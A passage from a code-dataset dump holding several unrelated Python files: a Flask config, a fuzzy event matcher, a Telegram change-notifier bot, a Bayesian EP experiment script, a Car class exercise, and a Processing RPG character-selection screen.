os.path.abspath(os.path.dirname(__file__))\n\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'db.sqlite')\n#SQLALCHEMY_DATABASE_URI = 'mysql://vagrant:vagrant@localhost/fsa'\nSQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')\nSQLALCHEMY_COMMIT_ON_TEARDOWN = True\nREMEMBER_COOKIE_DURATION = timedelta(days=1)\n\nCSRF_ENABLED = True\nSECRET_KEY = 'very-secret-for-now'\n\n\nADMINS = ['eddy@thehackerati.com']\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"87065505","text":"from fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nclass eventObj:\n def __init__(self):\n self.name = input('name: ')\n self.typee = input('type: ')\n self.theme = input('theme: ')\n \nclass vacebularry:\n def __init__(self):\n self.name=[]\n self.typee=[]\n self.theme=[]\n f = open('vac.dat')\n i=0\n for line in f:\n if i==0:\n if line==']\\n':\n i+=1\n else:\n self.name.append(line)\n elif i==1:\n if line==']\\n':\n i+=1\n else:\n self.typee.append(line)\n \n elif i==2:\n if line==']\\n':\n i+=1\n else:\n self.theme.append(line)\n f.close()\n def compairing(self, event):\n res=0\n j=0\n for i in range(len(self.name)):\n if fuzz.partial_ratio(self.name[i], event.name)>j:\n j=fuzz.partial_ratio(self.name[i], event.name)\n print(j)\n res+=j/100\n j=0\n for i in range(len(self.typee)):\n if fuzz.partial_ratio(self.typee[i], event.typee)>j:\n j=fuzz.partial_ratio(self.typee[i], event.typee)\n print(j)\n res+=j/100\n j=0\n for i in range(len(self.theme)):\n if fuzz.partial_ratio(self.theme[i], event.theme)>j:\n j=fuzz.partial_ratio(self.theme[i], event.theme)\n print(j)\n return (res+j/100)/3\n def close(self):\n f = open('vac.dat', 'w')\n for i in range(len(self.name)):\n f.write(self.name[i])\n for i in range(len(self.typee)):\n f.write(self.typee[i])\n for i in range(len(self.theme)):\n f.write(self.theme[i])\n\ntry:\n event = eventObj()\n vac = vacebularry()\n print(vac.compairing(event)*100, '%')\nexcept Exception as e:\n raise e\n vac.close()\n\n","sub_path":"hack.py","file_name":"hack.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"272542873","text":"# coding: utf-8\nimport argparse\nimport logging\nimport os\nimport json\nimport requests\nfrom telegram.ext import Updater\nfrom time import sleep\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n\nclass Check():\n def __init__(self, authToken, url, chatId):\n self.lastContent = \"\"\n self.filePath = os.path.dirname(os.path.realpath(__file__)) + \"\\cache\"\n self.authToken = authToken\n self.url = url\n self.chatId = chatId\n\n def cacheContainsId(self, id, cache):\n for j in cache['nodes']:\n if j['id'] == id:\n return True\n return False\n\n def run(self):\n while True:\n if not os.path.isfile(self.filePath) or os.path.getsize(self.filePath) == 0:\n with open(self.filePath, \"w\") as file:\n self.lastContent = json.loads(requests.get(self.url).text)\n json.dump(self.lastContent, file)\n else:\n with open(self.filePath, \"r\") as file:\n self.lastContent = json.load(file)\n\n r = requests.get(self.url)\n js = json.loads(r.text)\n\n if self.lastContent['nodes'] != js['nodes']:\n updater = Updater(self.authToken)\n for i in js['nodes']:\n isNew = self.cacheContainsId(i['id'], self.lastContent)\n if not isNew:\n updater.bot.sendMessage(chat_id=self.chatId,\n text=\"Neuer Knoten {}\".format(i['id'], i['name']), parse_mode=\"html\")\n\n self.lastContent = js\n\n with open(self.filePath, \"w\") as file:\n json.dump(self.lastContent, file)\n\n logging.info(\"Sleeping 60s\")\n sleep(60)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Überprüft eine JSON-Datei nach Änderungen\")\n parser.add_argument(\"-token\", type=str, required=True, help=\"Authtoken für den Telegram Bot\")\n parser.add_argument(\"-url\", type=str, required=True, help=\"Netzwerkpfad zur JSON-Datei\")\n parser.add_argument(\"-chat\", type=int, required=True,\n help=\"Telegram Chat-ID an die die Benachrichtigung gesendet werden soll\")\n parsed_args = parser.parse_args()\n\n if not parsed_args.token:\n parser.print_help()\n exit()\n\n Check(parsed_args.token, parsed_args.url, parsed_args.chat).run()\n","sub_path":"checkForUpdates.py","file_name":"checkForUpdates.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"326316089","text":"\"\"\"A simple hierarchical logistic regression experiment for distributed EP\nalgorithm described in an article \"Expectation propagation as a way of life\"\n(arXiv:1412.4869).\n\nGroup index j = 1 ... J\nModel m3:\n y_j ~ bernoulli_logit(alpha_j + beta_j * x_j)\n alpha_j ~ N(mu_a,sigma_a)\n beta_j ~ N(mu_b,sigma_b)\n Cov([beta_j]_a, [beta_j]_b) = 0, a != b\n mu_a ~ N(0,sigma_ma)\n mu_b ~ N(0,sigma_mb)\n sigma_a ~ log-N(0,sigma_sa)\n sigma_b ~ log-N(0,sigma_sb)\n Fixed sigma_ma, sigma_mb, sigma_sa, sigma_sb\n phi = [mu_a, log(sigma_a), mu_b, log(sigma_b)]\n\nExecute with:\n $ python fit_.py [mtype]\nwhere argument mtype can be either `full` or `distributed`. If type is omitted,\nboth models are fit. The results are saved into files res_f_.npz and\nres_d_.npz into the folder results respectively.\n\nAfter running this skript for both full and distributed, the script plot_res.py\ncan be used to plot the results.\n\nThe most recent version of the code can be found on GitHub:\nhttps://github.com/gelman/ep-stan\n\n\"\"\"\n\n# Licensed under the 3-clause BSD license.\n# http://opensource.org/licenses/BSD-3-Clause\n#\n# Copyright (C) 2014 Tuomas Sivula\n# All rights reserved.\n\nfrom __future__ import division\nimport os\nimport numpy as np\n\nfrom fit import fit_distributed, fit_full\n\n\n# ------------------------------------------------------------------------------\n# >>>>>>>>>>>>> Configurations start >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n# ------------------------------------------------------------------------------\n\n# ====== Seed ==================================================================\n# Use SEED = None for random seed\nSEED_DATA = 0 # Seed for simulating the data\nSEED_MCMC = 0 # Seed for the inference algorithms\n\n# ====== Data size =============================================================\nJ = 10 # Number of hierarchical groups\nD = 10 # Number of inputs\nK = 10 # Number of sites\nNPG = [40,60] # Number of observations per group (constant or [min, max])\n\n# ====== Set parameters ========================================================\n# If MU_A is None, it is sampled from N(0,SIGMA_MA)\nMU_A = 0.1\nSIGMA_MA = None\n# If SIGMA_A is None, it is sampled from log-N(0,SIGMA_SA)\nSIGMA_A = 1\nSIGMA_SA = None\nSIGMA_MB = 0\nSIGMA_SB = 1\n\n# ====== Prior =================================================================\n# Prior for mu_a\nM0_MA = 0\nV0_MA = 2**2\n# Prior for log(sigma_a)\nM0_SA = 0\nV0_SA = 2**2\n# Prior for mu_b\nM0_MB = 0\nV0_MB = 2**2\n# Prior for log(sigma_b)\nM0_SB = 0\nV0_SB = 2**2\n\n# ====== Sampling parameters ===================================================\nCHAINS = 4\nITER = 800\nWARMUP = 400\nTHIN = 2\n\n# ====== Number of EP iterations ===============================================\nEP_ITER = 6\n\n# ====== Tilted distribution precision estimate method =========================\n# Available options are 'sample' and 'olse', see class serial.Master.\nPREC_ESTIM = 'olse'\n\n# ====== 32bit Python ? ========================================================\n# Temp fix for the RandomState seed problem with pystan in 32bit Python. Set\n# the following to True if using 32bit Python.\nTMP_FIX_32BIT = True\n\n# ------------------------------------------------------------------------------\n# <<<<<<<<<<<<< Configurations end <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n# ------------------------------------------------------------------------------\n\n\ndef main(mtype='both'):\n \n # Check mtype\n if mtype != 'both' and mtype != 'full' and mtype != 'distributed':\n raise ValueError(\"Invalid argument `mtype`\")\n \n model_name = 'm3'\n \n # ------------------------------------------------------\n # Simulate data\n # ------------------------------------------------------\n \n # Set seed\n rnd_data = np.random.RandomState(seed=SEED_DATA)\n \n # Parameters\n # Number of observations for each group\n if hasattr(NPG, '__getitem__') and len(NPG) == 2:\n Nj = rnd_data.randint(NPG[0],NPG[1]+1, size=J)\n else:\n Nj = NPG*np.ones(J, dtype=np.int64)\n # Total number of observations\n N = np.sum(Nj)\n # Observation index limits for J groups\n j_lim = np.concatenate(([0], np.cumsum(Nj)))\n # Group indices for each sample\n j_ind = np.empty(N, dtype=np.int64)\n for j in xrange(J):\n j_ind[j_lim[j]:j_lim[j+1]] = j\n \n # Assign parameters\n if SIGMA_A is None:\n sigma_a = np.exp(rnd_data.randn()*SIGMA_SA)\n else:\n sigma_a = SIGMA_A\n if MU_A is None:\n mu_a = rnd_data.randn()*SIGMA_MA\n else:\n mu_a = MU_A\n sigma_b = np.exp(rnd_data.randn(D)*SIGMA_SB)\n mu_b = rnd_data.randn(D)*SIGMA_MB\n alpha_j = mu_a + rnd_data.randn(J)*sigma_a\n beta_j = mu_b + rnd_data.randn(J,D)*sigma_b\n dphi = 2*D+2 # Number of shared parameters\n phi_true = np.empty(dphi)\n phi_true[0] = mu_a\n phi_true[1] = np.log(sigma_a)\n phi_true[2:2+D] = mu_b\n phi_true[2+D:] = np.log(sigma_b)\n \n # Simulate data\n X = rnd_data.randn(N,D)\n y = np.empty(N)\n for n in xrange(N):\n y[n] = alpha_j[j_ind[n]] + X[n].dot(beta_j[j_ind[n]])\n y = 1/(1+np.exp(-y))\n y = (rnd_data.rand(N) < y).astype(int)\n \n # ------------------------------------------------------\n # Prior\n # ------------------------------------------------------\n \n # Moment parameters of the prior (transposed in order to get F-contiguous)\n S0 = np.empty(dphi)\n S0[0] = V0_MA\n S0[1] = V0_SA\n S0[2:2+D] = V0_MB\n S0[2+D:] = V0_SB\n S0 = np.diag(S0).T\n m0 = np.empty(dphi)\n m0[0] = M0_MA\n m0[1] = M0_SA\n m0[2:2+D] = M0_MB\n m0[2+D:] = M0_SB\n # Natural parameters of the prior\n Q0 = np.diag(1/np.diag(S0)).T\n r0 = m0/np.diag(S0)\n prior = {'Q':Q0, 'r':r0}\n \n # ------------------------------------------------------\n # Fit model(s)\n # ------------------------------------------------------\n \n if mtype == 'both' or mtype == 'distributed':\n \n # Options for the ep-algorithm see documentation of dep.serial.Master\n options = {\n 'seed' : SEED_MCMC,\n 'init_prev' : True,\n 'prec_estim' : PREC_ESTIM,\n 'chains' : CHAINS,\n 'iter' : ITER,\n 'warmup' : WARMUP,\n 'thin' : THIN,\n 'prior' : prior\n }\n # Temp fix for the RandomState seed problem with pystan in 32bit Python\n options['tmp_fix_32bit'] = TMP_FIX_32BIT\n \n fit_distributed(model_name, EP_ITER, J, K, Nj, X, y, phi_true, options)\n \n if mtype == 'both' or mtype == 'full':\n \n seed = np.random.RandomState(seed=SEED_MCMC)\n \n # Temp fix for the RandomState seed problem with pystan in 32bit Python\n seed = seed.randint(2**31-1) if TMP_FIX_32BIT else seed\n \n fit_full(model_name, J, j_ind, X, y, phi_true, m0, Q0, seed)\n \n\nif __name__ == '__main__':\n if len(os.sys.argv) == 2:\n main(os.sys.argv[1])\n else:\n main()\n\n\n\n","sub_path":"experiment/fit_m3.py","file_name":"fit_m3.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"386540537","text":"#!/usr/bin/env python\n\nfrom enum import Enum\nfrom random import randint\n\n\"\"\"\nРеализуйте базовый класс Car. У данного класса должны быть следующие атрибуты: speed, color, name, is_police (булево).\nА также методы: go, stop, turn(direction), которые должны сообщать, что машина поехала, остановилась, повернула (куда).\nОпишите несколько дочерних классов: TownCar, SportCar, WorkCar, PoliceCar. Добавьте в базовый класс метод show_speed,\nкоторый должен показывать текущую скорость автомобиля. Для классов TownCar и WorkCar переопределите метод show_speed.\nПри значении скорости свыше 60 (TownCar) и 40 (WorkCar) должно выводиться сообщение о превышении скорости.\n\nСоздайте экземпляры классов, передайте значения атрибутов. Выполните доступ к атрибутам, выведите результат.\nВыполните вызов методов и также покажите результат.\n\"\"\"\n\n\nclass Colors(Enum):\n RED = \"red\"\n GREEN = \"green\"\n BLUE = \"blue\"\n BLACK = \"black\"\n YELLOW = \"yellow\"\n WHITE = \"white\"\n\n\nclass Directions(Enum):\n LEFT = \"left\"\n RIGHT = \"right\"\n\n\nclass Car:\n _name = \"\"\n _color = \"\"\n _speed = 0\n _is_police = False\n\n def __init__(self, name, color, speed=0, is_police=False):\n self._name = name\n self._color = color\n self._speed = speed\n self._is_police = is_police\n\n def set_speed(self, speed):\n self._speed = speed\n\n def get_speed(self):\n return self._speed\n\n def show_speed(self):\n print(f\"{self._name}, current speed: {self._speed}\")\n\n def go(self):\n self.set_speed(randint(1, 280))\n print(f\"Car '{self._name}' started to move\")\n\n def stop(self):\n self.set_speed(0)\n print(f\"Car '{self._name}' stopped\")\n\n def turn(self, direction):\n print(f\"Car '{self._name}' turned '{direction.value}'\")\n\n\nclass TownCar(Car):\n def __init__(self, name, color=Colors.WHITE):\n super().__init__(name, color=color, is_police=False)\n\n def show_speed(self):\n print(f\"{self._name}, current speed: {self._speed}\")\n if self.get_speed() > 60:\n print(\"Car is moving too fast. I am calling the police!\")\n\n\nclass SportCar(Car):\n def __init__(self, name, color=Colors.RED):\n super().__init__(name, color=color, is_police=False)\n\n\nclass WorkCar(Car):\n def __init__(self, name, color=Colors.YELLOW):\n super().__init__(name, color=color, is_police=False)\n\n def show_speed(self):\n print(f\"{self._name}, current speed: {self._speed}\")\n if self.get_speed() > 40:\n print(\"Car is moving too fast. I am calling to your Boss!\")\n\n\nclass PoliceCar(Car):\n def __init__(self, name, color=Colors.BLUE):\n super().__init__(name, color=color, is_police=True)\n\n\ndef main():\n # Random car\n random_car = Car(\"Volvo\", Colors.BLACK)\n random_car.go()\n random_car.turn(Directions.LEFT)\n random_car.show_speed()\n random_car.stop()\n\n # Town car\n t_car = TownCar(\"Suzuki\")\n t_car.go()\n t_car.turn(Directions.RIGHT)\n t_car.show_speed()\n t_car.stop()\n\n # Sport car\n s_car = SportCar(\"Ferrari\")\n s_car.go()\n s_car.turn(Directions.LEFT)\n s_car.show_speed()\n s_car.stop()\n\n # Work car\n w_car = WorkCar(\"Reno\")\n w_car.go()\n w_car.turn(Directions.RIGHT)\n w_car.show_speed()\n w_car.stop()\n\n # Police car\n p_car = PoliceCar(\"Lada\", Colors.BLACK)\n p_car.go()\n p_car.turn(Directions.RIGHT)\n p_car.show_speed()\n p_car.stop()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lesson-6/task04.py","file_name":"task04.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"421763002","text":"state = 0\nplayers = 0\nwar = False\nwiz = False\nrog = False\nran = False\npal = False\nmon = False\nwarl = False\nsai = False\ncharList = []\ncharInList = 0\ncurrChar = []\nbagi = 0\nbstr = 0\nbdex = 0\nbint = 0\npoints = 2\nfinalChars = []\nwarriorimg = 0\nwizardimg = 0\nrogueimg = 0\nrangerimg = 0\npaladinimg = 0\nmonkimg = 0\nwarlockimg = 0\nsaintimg = 0\n\n'''Loads the images of the characters'''\ndef loadCharImg():\n global warriorimg\n global wizardimg\n global rogueimg\n global rangerimg\n global paladinimg\n global monkimg\n global warlockimg\n global saintimg\n warriorimg = loadImage(\"Warrior.png\")\n wizardimg = loadImage(\"Wizard.png\")\n rogueimg = loadImage(\"Rogue.png\")\n rangerimg = loadImage(\"Ranger.png\")\n paladinimg = loadImage(\"Paladin.png\")\n monkimg = loadImage(\"Monk.png\")\n warlockimg = loadImage(\"Warlock.png\")\n saintimg = loadImage(\"Saint.png\")\n\n\n'''Prints all text that appears in this window for the character selecter'''\ndef printText():\n global warriorimg\n global wizardimg\n global rogueimg\n global rangerimg\n global paladinimg\n global monkimg\n global warlockimg\n global saintimg\n fill(0,0,0)\n textSize(32)\n text(\"Warrior\",100,330)\n image(warriorimg, 50, 50, 213, 250)\n text(\"Wizard\",353,330)\n image(wizardimg, 303, 50, 213, 250)\n text(\"Rogue\",606,330)\n image(rogueimg, 556, 50, 213, 250)\n text(\"Ranger\",859,330)\n image(rangerimg, 809, 50, 213, 250)\n text(\"Paladin\",100,650)\n image(paladinimg, 50, 370, 213, 250)\n text(\"Monk\",358,650)\n image(monkimg, 303, 370, 213, 250)\n text(\"Warlock\",606,650)\n image(warlockimg, 556, 370, 213, 250)\n text(\"Saint\",864,650)\n image(saintimg, 809, 370, 213, 250)\n text(\"Confirm\",1185,620)\n \n'''Sets the base stats for the current character in the stat changer'''\ndef setBases(x):\n global currChar\n global bagi\n global bstr\n global bdex\n global bint\n currChar = list(charList[x])\n bagi = charList[x][4]\n bstr = charList[x][2]\n bdex = charList[x][3]\n bint = charList[x][5]\n \n'''Sets up the title screen/main menu'''\ndef setup():\n background(139,0,0)\n size(1500, 800)\n fill(218,165,32)\n rect(350,350,800,150)\n rect(350,575,800,150)\n textSize(200)\n text(\"World's End\", 175, 200)\n fill(0)\n textSize(72)\n text(\"Start Game\", 550, 450)\n text(\"Exit Game\", 575, 675)\n\n\n'''Sets up the character selecter'''\ndef setup2():\n background(139,0,0)\n size(1500, 800)\n fill(255)\n rect(40,40,233,300)\n rect(293,40,233,300)\n rect(546,40,233,300)\n rect(799,40,233,300)\n rect(40,360,233,300)\n rect(293,360,233,300)\n rect(546,360,233,300)\n rect(799,360,233,300)\n fill(150)\n rect(1150,560,200,100)\n loadCharImg()\n printText()\n \n'''Sets up the stat distributor'''\ndef setup3():\n global charInList\n size(1500, 800)\n fill(255)\n background(139,0,0)\n setBases(charInList)\n \n'''Sets up the letter screen'''\ndef setup50():\n size(1500,800)\n fill(218,165,32)\n rect(1150,560,200,100)\n fill(0)\n textSize(32)\n text(\"Continue\",1180,620)\n letter = loadImage(\"letter.png\")\n image(letter, 200,0,600,800)\n\ndef charHover():\n textSize(18)\n if 40 < mouseX < 270 and 40 < mouseY < 340 and war == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Warrior\", 1125, 90)\n textSize(24)\n text(\"HP:25\\nAgility:2\\nIntelligence:1\\nStrength:5\\nDexterity:2\", 1125, 125)\n textSize(12)\n text(\"The Sound of Fear - When used, any damage\\ndone to a different player gets directed\\nto the warrior. A temporary hp bonus\\nequal to half the Warrior's maximum health\\nfor the entire battle and pulls aggro regardless\\nof when they attacked for 1 turn\\n(this bonus stacks with your current health).\", 1125, 300)\n \n elif 293 < mouseX < 526 and 40 < mouseY < 340 and wiz == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Wizard\", 1125, 90)\n textSize(24)\n text(\"HP:10\\nAgility:3\\nIntelligence:5\\nStrength:2\\nDexterity:3\", 1125, 125)\n textSize(12)\n text(\"Arcane Expertise - The Wizard is capable of\\nlearning any spell, with its cooldown\\nbeing equal to its rarity (magic missile\\nno cooldown, uncommon 2 battles, rare 3\\nbattles, legendary 4 battles, The Wizard cannot\\nlearn resurrection magic.)\", 1125, 300)\n \n elif 546 < mouseX < 779 and 40 < mouseY < 340 and rog == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Rogue\", 1125, 90)\n textSize(24)\n text(\"HP:15\\nAgility:5\\nIntelligence:2\\nStrength:2\\nDexterity:3\", 1125, 125)\n textSize(12)\n text(\"Assassinate - When the Rogue is faster than\\nits opponent they deal a preemptive strike\\non the turn they join the combat instead\\nof doing their normal attack. The damage\\nis equal to the rogue's weapon damage,\\nplus AGI + DEX.\", 1125, 300)\n \n elif 799 < mouseX < 1032 and 40 < mouseY < 340 and ran == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Ranger\", 1125, 90)\n textSize(24)\n text(\"HP:15\\nAgility:4\\nIntelligence:2\\nStrength:1\\nDexterity:5\", 1125, 125)\n textSize(12)\n text(\"Snipe - If the Ranger is two spaces away from\\nan encounter the Ranger hasn't started,\\nthey can join combat from two spaces away.\\nIf the player that generated the encounter\\ndies, the encounter shifts from the dead\\nplayer to the ranger, and the encounter\\nwill start attacking after a 1 turn delay, (this\\nclass ability can only be used if the Ranger\\nposseses a DEX-Based Ranged weapon).\", 1125, 300)\n \n elif 40 < mouseX < 270 and 360 < mouseY < 660 and pal == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Paladin\", 1125, 90)\n textSize(24)\n text(\"HP:20\\nAgility:2\\nIntelligence:4\\nStrength:4\\nDexterity:1\", 1125, 125)\n textSize(12)\n text(\"Empower Weapon - At any point in combat the\\nPaladin can imbue their weapon with the\\nsacred magic they know from the start of the\\ngame to give their next attack a special effect,\\nspecified on the spell card. Also makes\\ndamage weapon power + intelligence for\\none attack. (Has a cooldown of 2 turns).\", 1125, 300)\n \n elif 293 < mouseX < 526 and 360 < mouseY < 660 and mon == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Monk\", 1125, 90)\n textSize(24)\n text(\"HP:15\\nAgility:4\\nIntelligence:2\\nStrength:2\\nDexterity:4\", 1125, 125)\n textSize(12)\n text(\"Taoism - At any point in combat the Monk can\\nmake two attacks in one turn, the standard\\ndealing 100% damage and the second strike\\nat half damage value of the first strike. This\\nability isn't usable when the Monk is using\\na two handed weapon. (Has a cooldown of\\n3 turns).\", 1125, 300)\n \n elif 546 < mouseX < 779 and 360 < mouseY < 660 and warl == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Warlock\", 1125, 90)\n textSize(24)\n text(\"HP:15\\nAgility:3\\nIntelligence:5\\nStrength:2\\nDexterity:2\", 1125, 125)\n textSize(10)\n text(\"Intertwine Fate - The Warlock can bind a creature\\nof Uncommon or lower ranking to the Warlock.\\nThe creature will be decided by drawing monsters\\nfrom the monster pile until a common or uncommon\\nmonster card is drawn. The creature and Warlock\\nare bound by life, when the creature dies\\nthe Warlock receives damage depending on\\nthe ranking of the monster (Common = 5 damage,\\nUncommon = 10 damage). The creature acts directly\\nafter the Warlock's turn. The warlock can summon\\nanother creature if their current creature\\nhas died, but with every summoned creature's\\ndeath, the damage penalty for a creature\\ndying will increase by 2.\", 1125, 300)\n \n elif 799 < mouseX < 1032 and 360 < mouseY < 660 and sai == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Saint\", 1125, 90)\n textSize(24)\n text(\"HP:15\\nAgility:3\\nIntelligence:5\\nStrength:1\\nDexterity:3\", 1125, 125)\n textSize(12)\n text(\"Divine Blessing - When the Saint uses a\\nhealing type spell they can make the effects\\nparty wide for as long as the group is fighting\\nwithin the same encounter, or on the\\nsame space.\", 1125, 300)\n \n else:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n \n'''Draws all non-changing text in the program in the stat distributor'''\ndef drawText():\n textSize(32)\n fill(0)\n text(\"-\",728,248)\n text(\"-\",728,298)\n text(\"-\",728,348)\n text(\"-\",728,398)\n text(\"+\",825,248)\n text(\"+\",825,298)\n text(\"+\",825,348)\n text(\"+\",825,398)\n textSize(72)\n text(\"Confirm\", 485, 575)\n\n'''Draws all changing text in the program, using character x. Stat distributor'''\ndef drawCharacter(x):\n global currChar\n global warriorimg\n global wizardimg\n global rogueimg\n global rangerimg\n global paladinimg\n global monkimg\n global warlockimg\n global saintimg\n background(139,0,0)\n fill(0)\n textSize(72)\n text(charList[x][0],50,100)\n textSize(32)\n text(\"HP: \" + str(currChar[1]),400,200)\n text(\"Agility: \" + str(currChar[4]), 400, 250)\n text(\"Intelligence: \" + str(currChar[5]), 400, 300)\n text(\"Strength: \" + str(currChar[2]), 400, 350)\n text(\"Dexterity: \" + str(currChar[3]), 400, 400)\n text(\"Stat points left to assign: \" + str(points), 400, 450)\n if currChar[0] == \"Warrior\":\n image(warriorimg, 50, 150, 300, 400)\n elif currChar[0] == \"Wizard\":\n image(wizardimg, 50, 150, 300, 400)\n elif currChar[0] == \"Rogue\":\n image(rogueimg, 50, 150, 300, 400)\n elif currChar[0] == \"Ranger\":\n image(rangerimg, 50, 150, 300, 400)\n elif currChar[0] == \"Paladin\":\n image(paladinimg, 50, 150, 300, 400)\n elif currChar[0] == \"Monk\":\n image(monkimg, 50, 150, 300, 400)\n elif currChar[0] == \"Warlock\":\n image(warlockimg, 50, 150, 300, 400)\n else:\n image(saintimg, 50, 150, 300, 400)\n \n'''Draws all buttons for the stat distributor'''\ndef drawButtons(x):\n if((currChar[4]) != (charList[x][4])):\n fill(255)\n rect(700, 222, 75, 32)\n else:\n fill(180)\n rect(700, 222, 75, 32)\n if((currChar[5]) != (charList[x][5])):\n fill(255)\n rect(700, 272, 75, 32)\n else:\n fill(180)\n rect(700, 272, 75, 32)\n if((currChar[2]) != (charList[x][2])):\n fill(255)\n rect(700, 322, 75, 32)\n else:\n fill(180)\n rect(700, 322, 75, 32)\n if((currChar[3]) != (charList[x][3])):\n fill(255)\n rect(700, 372, 75, 32)\n else:\n fill(180)\n rect(700, 372, 75, 32)\n \n if((currChar[4]) != 5 and points > 0):\n fill(255)\n rect(800, 222, 75, 32)\n else:\n fill(180)\n rect(800, 222, 75, 32)\n if((currChar[5]) != 5 and points > 0):\n fill(255)\n rect(800, 272, 75, 32)\n else:\n fill(180)\n rect(800, 272, 75, 32)\n if((currChar[2]) != 5 and points > 0):\n fill(255)\n rect(800, 322, 75, 32)\n else:\n fill(180)\n rect(800, 322, 75, 32)\n if((currChar[3]) != 5 and points > 0):\n fill(255)\n rect(800, 372, 75, 32)\n else:\n fill(180)\n rect(800, 372, 75, 32) \n \n if(points == 0):\n fill(255)\n rect(400, 500, 475, 100)\n else:\n fill(180)\n rect(400, 500, 475, 100)\n drawText()\n \ndef mousePressed():\n global state\n if state == 0: #title screen\n if mousePressed and 350 < mouseX < 1150 and 350 < mouseY < 500:\n fill(230)\n background(139,0,0)\n state = 50\n setup50()\n if mousePressed and 350 < mouseX < 1150 and 575 < mouseY < 725:\n exit()\n if state == 1: #character selection\n global players\n global war\n global wiz\n global rog\n global ran\n global pal\n global mon\n global warl\n global sai\n \n if mousePressed and 40 < mouseX < 270 and 40 < mouseY < 340 and war == False:\n fill(150)\n players +=1\n war = True\n charList.append((\"Warrior\",25,5,2,2,1))\n elif war == True:\n fill(150)\n else:\n fill(255)\n rect(40,40,233,300)\n if mousePressed and 293 < mouseX < 526 and 40 < mouseY < 340 and wiz == False:\n fill(150)\n players +=1\n wiz = True\n charList.append((\"Wizard\", 10,2,3,3,5))\n elif wiz == True:\n fill(150)\n else:\n fill(255)\n rect(293,40,233,300)\n if mousePressed and 546 < mouseX < 779 and 40 < mouseY < 340 and rog == False:\n fill(150)\n players +=1\n rog = True\n charList.append((\"Rogue\", 15,2,3,5,2))\n elif rog == True:\n fill(150)\n else:\n fill(255)\n rect(546,40,233,300)\n if mousePressed and 799 < mouseX < 1032 and 40 < mouseY < 340 and ran == False:\n fill(150)\n players +=1\n ran = True\n charList.append((\"Ranger\", 15,1,5,4,2))\n elif ran == True:\n fill(150)\n else:\n fill(255)\n rect(799,40,233,300)\n if mousePressed and 40 < mouseX < 270 and 360 < mouseY < 660 and pal == False:\n fill(150)\n players +=1\n pal = True\n charList.append((\"Paladin\", 20,4,1,2,4))\n elif pal == True:\n fill(150)\n else:\n fill(255)\n rect(40,360,233,300)\n if mousePressed and 293 < mouseX < 526 and 360 < mouseY < 660 and mon == False:\n fill(150)\n players +=1\n mon = True\n charList.append((\"Monk\", 15,2,4,4,2))\n elif mon == True:\n fill(150)\n else:\n fill(255)\n rect(293,360,233,300)\n if mousePressed and 546 < mouseX < 779 and 360 < mouseY < 660 and warl == False:\n fill(150)\n players +=1\n warl = True\n charList.append((\"Warlock\", 15,2,2,3,5))\n elif warl == True:\n fill(150)\n else:\n fill(255)\n rect(546,360,233,300)\n if mousePressed and 799 < mouseX < 1032 and 360 < mouseY < 660 and sai == False:\n fill(150)\n players +=1\n sai = True\n charList.append((\"Saint\", 15,1,3,3,5))\n elif sai == True:\n fill(150)\n else:\n fill(255)\n rect(799,360,233,300)\n if players < 2:\n fill(150)\n elif mousePressed and 1150 < mouseX < 1350 and 560 < mouseY < 660 and players >= 2:\n fill(230)\n state +=1\n background(139,0,0)\n setup3()\n else:\n fill(255)\n rect(1150,560,200,100)\n printText()\n elif state == 2: #stat distributor\n global currChar\n global points\n global finalChars\n global charInList\n classname = currChar[0]\n HP = currChar[1]\n strength = currChar[2]\n dex = currChar[3]\n agi = currChar[4]\n intl = currChar[5]\n if mousePressed and 700 < mouseX < 775 and 222 < mouseY < 254 and agi != bagi:\n agi -= 1\n points +=1\n if mousePressed and 800 < mouseX < 875 and 222 < mouseY < 254 and agi != 5 and points > 0:\n agi += 1\n points -=1\n if mousePressed and 700 < mouseX < 775 and 272 < mouseY < 304 and intl != bint:\n intl -= 1\n points +=1\n if mousePressed and 800 < mouseX < 875 and 272 < mouseY < 304 and intl != 5 and points > 0:\n intl += 1\n points -=1\n if mousePressed and 700 < mouseX < 775 and 322 < mouseY < 354 and strength != bstr:\n strength -= 1\n points +=1\n if mousePressed and 800 < mouseX < 875 and 322 < mouseY < 354 and strength !=5 and points > 0:\n strength += 1\n points -=1\n if mousePressed and 700 < mouseX < 775 and 372 < mouseY < 404 and dex != bdex:\n dex -= 1\n points +=1\n if mousePressed and 800 < mouseX < 875 and 372 < mouseY < 404 and dex != 5 and points > 0:\n dex += 1\n points -=1\n currChar = (classname,HP,strength,dex,agi,intl)\n if mousePressed 